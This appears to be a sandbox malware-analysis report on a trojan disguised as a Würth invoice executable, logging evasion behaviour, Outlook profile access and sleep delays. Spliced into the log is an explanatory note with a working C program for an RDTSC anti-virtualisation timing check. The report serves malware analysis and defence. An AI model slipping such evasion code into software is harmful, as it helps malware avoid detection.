Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69A9F0 4_2_3A69A9F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69F1D0 4_2_3A69F1D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A6909D0 4_2_3A6909D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A698DD0 4_2_3A698DD0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69BFD0 4_2_3A69BFD0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A6909BF 4_2_3A6909BF
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69D5B0 4_2_3A69D5B0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69A3B0 4_2_3A69A3B0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69B990 4_2_3A69B990
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A698790 4_2_3A698790
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A69EB90 4_2_3A69EB90
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A811B50 4_2_3A811B50
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A813008 4_2_3A813008
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A8136F0 4_2_3A8136F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A811470 4_2_3A811470
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A812920 4_2_3A812920
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A810D88 4_2_3A810D88
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A812238 4_2_3A812238
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A811B3F 4_2_3A811B3F
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A8136E1 4_2_3A8136E1
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A811460 4_2_3A811460
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A810A10 4_2_3A810A10
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A8108DE 4_2_3A8108DE
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A812911 4_2_3A812911
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A810960 4_2_3A810960
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A812FFA 4_2_3A812FFA
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A810D7A 4_2_3A810D7A
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A812229 4_2_3A812229
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A810007 4_2_3A810007
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A810040 4_2_3A810040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A9038D0 4_2_3A9038D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A901A20 4_2_3A901A20
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A909130 4_2_3A909130
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A902638 4_2_3A902638
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: String function: 00402BBF appears 51 times
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Wuerth_factura_4052073226..exe
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296370437.0000000037207000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Wuerth_factura_4052073226..exe
Source: Wuerth_factura_4052073226..exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/6@5/5
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 0_2_0040327D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040327D
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_004032B2 lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_004032B2
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 0_2_0040458C GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_0040458C
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 0_2_00402095 CoCreateInstance, 0_2_00402095
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe File created: C:\Users\user\Sympodia
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Mutant created: NULL
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe File created: C:\Users\user\AppData\Local\Temp\nsp5FF1.tmp
Source: Wuerth_factura_4052073226..exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Wuerth_factura_4052073226..exe ReversingLabs: Detection: 52%
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe File read: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe
Source: unknown Process created: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe "C:\Users\user\Desktop\Wuerth_factura_4052073226..exe"
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Process created: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe "C:\Users\user\Desktop\Wuerth_factura_4052073226..exe"
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Process created: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe "C:\Users\user\Desktop\Wuerth_factura_4052073226..exe"
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: rasman.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Wuerth_factura_4052073226..exe Static file information: File size 1085283 > 1048576
Source: Wuerth_factura_4052073226..exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: Yara match File source: 00000000.00000002.2534956936.0000000005BC2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3272331155.0000000002F22000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_10001B18
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_000D9C30 push esp; retf 0018h 4_2_000D9D55
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_000D48F8 push eax; ret 4_2_000D4912
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_000D4928 push eax; ret 4_2_000D4912
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_000D4928 push eax; ret 4_2_000D4922
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_000D4928 push eax; ret 4_2_000D4962
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_000D4968 push eax; ret 4_2_000D4972
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_000D4978 push eax; ret 4_2_000D4982
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_000D4988 push eax; ret 4_2_000D4992
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_000D4A2D push eax; ret 4_2_000D4962
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_39DB4FA3 push FFFFFFB6h; iretd 4_2_39DB4FA5
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_39DBC6A3 push 0000003Fh; iretd 4_2_39DBC6A5
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A9036B8 push es; retf 4_2_3A9036A7
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe File created: C:\Users\user\AppData\Local\Temp\nsf6188.tmp\System.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Process information set: NOOPENFILEERRORBOX (58 identical entries)

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe API/Special instruction interceptor: Address: 5E76E5E
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe API/Special instruction interceptor: Address: 31D6E5E
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe RDTSC instruction interceptor: First address: 5E3D66E second address: 5E3D66E instructions: 0x00000000 rdtsc 0x00000002 test bh, ah 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F13D4DAA198h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe RDTSC instruction interceptor: First address: 319D66E second address: 319D66E instructions: 0x00000000 rdtsc 0x00000002 test bh, ah 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F13D522C168h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
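The two intercepted sequences above read the time-stamp counter twice with only a handful of instructions in between and branch on the difference. The following C program is an added illustration of that check, not code recovered from the sample: the counter source is injected as a function pointer so the decision logic can be exercised against a constructed fake clock, and the 1000-tick threshold is an assumption chosen for illustration (real loaders tune it to the hardware they expect).

```c
/* Added example, not the sample's code: an RDTSC timing probe in the spirit of
 * the two intercepted sequences, with the counter source injected so the
 * decision rule can be tested offline against a constructed fake clock. */
#define _POSIX_C_SOURCE 199309L
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>                      /* __rdtsc() */
uint64_t real_tsc(void) { return __rdtsc(); }
#else
#include <time.h>                           /* fallback so the file builds on non-x86 hosts */
uint64_t real_tsc(void)
{
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}
#endif

typedef uint64_t (*tsc_fn)(void);

/* Core of the check: read the counter twice back to back, `iters` times, and
 * return the average number of ticks between the two reads. On bare metal this
 * is a few dozen cycles; when a hypervisor traps RDTSC, or a sandbox single
 * steps or hooks the instruction (as the "RDTSC instruction interceptor"
 * entries show happened here), each read costs an exit and the delta jumps. */
uint64_t average_tsc_delta(tsc_fn read_tsc, unsigned iters)
{
    uint64_t total = 0;
    for (unsigned i = 0; i < iters; i++) {
        uint64_t t0 = read_tsc();
        uint64_t t1 = read_tsc();
        total += t1 - t0;
    }
    return iters ? total / iters : 0;
}

/* Decision rule: 1 = "looks instrumented or virtualised", 0 = "looks native". */
int looks_instrumented(tsc_fn read_tsc, unsigned iters, uint64_t threshold)
{
    return average_tsc_delta(read_tsc, iters) > threshold;
}

/* Constructed fake counter (not a real clock) that advances by a fixed step on
 * every read, so a "fast native" and a "slow trapped" RDTSC can be simulated. */
static uint64_t fake_counter;
static uint64_t fake_step;

void fake_tsc_set_step(uint64_t step) { fake_counter = 0; fake_step = step; }

uint64_t fake_tsc(void)
{
    fake_counter += fake_step;
    return fake_counter;
}

int main(void)
{
    const uint64_t threshold = 1000;        /* assumed value for illustration */
    uint64_t avg = average_tsc_delta(real_tsc, 1000);
    printf("average delta between back-to-back reads: %llu ticks -> %s\n",
           (unsigned long long)avg,
           looks_instrumented(real_tsc, 1000, threshold) ? "instrumented" : "native");
    return 0;
}
```

Two caveats when reading such a hit in a report: RDTSC is also trapped or offset by many ordinary hypervisors, so the check distinguishes "virtual" from "native" rather than "sandbox" from "victim", and a sandbox that wants to survive it has to either run the sample on bare metal or keep the counter reads cheap and consistent rather than hooking the instruction.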
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Memory allocated: D0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Memory allocated: 37400000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Memory allocated: 37310000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 599874
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 599765
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 599656
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 599546
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 599436
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 599328
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 599218
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 599109
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 598999
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 598890
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 598781
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 598671
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 598562
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 598453
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 598343
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 598234
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 598124
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 598015
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 597906
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 597795
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 597646
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 597527
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 597406
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 597296
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 597187
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 597078
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 596968
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 596859
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 596749
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 596640
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 596531
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 596421
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 596312
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 596202
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 596078
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 595966
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 595843
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 595733
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 595624
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 595515
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 595404
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 595296
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 595187
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 595077
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 594968
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 594786
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 594475
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 594338
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 594217
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 594093
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 593968
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 593858
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Window / User API: threadDelayed 8108
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Window / User API: threadDelayed 1727
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf6188.tmp\System.dll
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe API coverage: 1.6 %
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -599874s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 5784 Thread sleep count: 8108 > 30
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 5784 Thread sleep count: 1727 > 30
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -599546s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -599436s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -599218s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -598999s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -598890s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -598781s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -598671s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -598562s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -598453s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -598343s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -598234s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -598124s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -598015s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -597906s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -597795s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -597646s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -597527s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -597406s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -597296s >= -30000s
